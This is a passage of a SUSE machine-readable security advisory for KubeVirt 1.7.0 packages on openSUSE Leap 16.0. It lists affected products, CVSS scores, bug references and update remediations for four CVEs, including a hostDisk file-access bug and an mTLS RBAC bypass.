"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-45310",
"url": "https://www.suse.com/security/cve/CVE-2024-45310"
},
{
"category": "external",
"summary": "SUSE Bug 1230092 for CVE-2024-45310",
"url": "https://bugzilla.suse.com/1230092"
},
{
"category": "external",
"summary": "SUSE Bug 1257413 for CVE-2024-45310",
"url": "https://bugzilla.suse.com/1257413"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.6,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:51:11Z",
"details": "low"
}
],
"title": "CVE-2024-45310"
},
{
"cve": "CVE-2025-22872",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-22872"
}
],
"notes": [
{
"category": "general",
"text": "The tokenizer incorrectly interprets tags with unquoted attribute values that end with a solidus character (/) as self-closing. When directly using Tokenizer, this can result in such tags incorrectly being marked as self-closing, and when using the Parse functions, this can result in content following such tags as being placed in the wrong scope during DOM construction, but only when tags are in foreign content (e.g. \u003cmath\u003e, \u003csvg\u003e, etc contexts).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-22872",
"url": "https://www.suse.com/security/cve/CVE-2025-22872"
},
{
"category": "external",
"summary": "SUSE Bug 1241710 for CVE-2025-22872",
"url": "https://bugzilla.suse.com/1241710"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:51:11Z",
"details": "moderate"
}
],
"title": "CVE-2025-22872"
},
{
"cve": "CVE-2025-64324",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64324"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. The `hostDisk` feature in KubeVirt allows mounting a host file or directory owned by the user with UID 107 into a VM. However, prior to version 1.6.1 and 1.7.0, the implementation of this feature and more specifically the `DiskOrCreate` option (which creates a file if it doesn\u0027t exist) has a logic bug that allows an attacker to read and write arbitrary files owned by more privileged users on the host system. Versions 1.6.1 and 1.7.0 fix the issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64324",
"url": "https://www.suse.com/security/cve/CVE-2025-64324"
},
{
"category": "external",
"summary": "SUSE Bug 1253748 for CVE-2025-64324",
"url": "https://bugzilla.suse.com/1253748"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:51:11Z",
"details": "important"
}
],
"title": "CVE-2025-64324"
},
{
"cve": "CVE-2025-64432",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64432"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. Versions 1.5.3 and below, and 1.6.0 contained a flawed implementation of the Kubernetes aggregation layer\u0027s authentication flow which could enable bypass of RBAC controls. It was discovered that the virt-api component fails to correctly authenticate the client when receiving API requests over mTLS. In particular, it fails to validate the CN (Common Name) field in the received client TLS certificates against the set of allowed values defined in the extension-apiserver-authentication configmap. Failre to validate certain fields in the client TLS certificate may allow an attacker to bypass existing RBAC controls by directly communicating with the aggregated API server, impersonating the Kubernetes API server and its aggregator component. This issue is fixed in versions 1.5.3 and 1.6.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
